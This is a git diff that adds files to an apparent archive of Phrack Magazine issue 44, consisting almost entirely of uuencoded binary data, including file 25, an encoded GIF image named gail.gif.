+MR?87-1V]$N;9TF4!=\MUE/(!<J^(',G1[G S)Z(5;4$YDO(*(7!G%9G:0#B/
+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
+?F,U/Z*&8A'1,MK6OC>UL:WO;W.ZVM[\-[G #("  .UZP
+ 
+end
+
diff --git a/phrack44/25.txt b/phrack44/25.txt
new file mode 100644
index 0000000..e3ced93
--- /dev/null
+++ b/phrack44/25.txt
@@ -0,0 +1,777 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 25 of 27
+
+****************************************************************************
+
+begin 777 gail.gif
+M1TE&.#=A0 '7 /<         50  J@  _P D   D50 DJ@ D_P!)  !)50!)
+MJ@!)_P!M  !M50!MJ@!M_P"2  "250"2J@"2_P"V  "V50"VJ@"V_P#;  #;
+M50#;J@#;_P#_  #_50#_J@#__R0  "0 520 JB0 _R0D "0D520DJB0D_R1)
+M "1)521)JB1)_R1M "1M521MJB1M_R22 "225222JB22_R2V "2V522VJB2V
+M_R3; "3;523;JB3;_R3_ "3_523_JB3__TD  $D 54D JDD _TDD $DD54DD
+MJDDD_TE) $E)54E)JDE)_TEM $EM54EMJDEM_TF2 $F254F2JDF2_TFV $FV
+M54FVJDFV_TG; $G;54G;JDG;_TG_ $G_54G_JDG__VT  &T 56T JFT _VTD
+M &TD56TDJFTD_VU) &U)56U)JFU)_VUM &UM56UMJFUM_VV2 &V256V2JFV2
+M_VVV &VV56VVJFVV_VW; &W;56W;JFW;_VW_ &W_56W_JFW__Y(  )( 59( 
+MJI( _Y(D )(D59(DJI(D_Y)) )))59))JI))_Y)M ))M59)MJI)M_Y*2 )*2
+M59*2JI*2_Y*V )*V59*VJI*V_Y+; )+;59+;JI+;_Y+_ )+_59+_JI+__[8 
+M +8 5;8 JK8 _[8D +8D5;8DJK8D_[9) +9)5;9)JK9)_[9M +9M5;9MJK9M
+M_[:2 +:25;:2JK:2_[:V +:V5;:VJK:V_[;; +;;5;;;JK;;_[;_ +;_5;;_
+MJK;__]L  -L 5=L JML _]LD -LD5=LDJMLD_]M) -M)5=M)JMM)_]MM -MM
+M5=MMJMMM_]N2 -N25=N2JMN2_]NV -NV5=NVJMNV_]O; -O;5=O;JMO;_]O_
+M -O_5=O_JMO___\  /\ 5?\ JO\ __\D /\D5?\DJO\D__]) /])5?])JO])
+M__]M /]M5?]MJO]M__^2 /^25?^2JO^2__^V /^V5?^VJO^V___; /_;5?_;
+MJO_;____ /__5?__JO___RP     0 '7   (_P MQ;)E25(M295D63IH*Y(M
+M6Y4>/EQH:2)$BK(J28JT,5*;.&U"BAPILE$;CQY)EOS8*$[+D"99@DQYLB;*
+MFB]KMFEI\F;/-I)VSG3DLHV;FQX;18JS5.G22%!/0HTCJ25*CE@C.8*JM&/5
+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
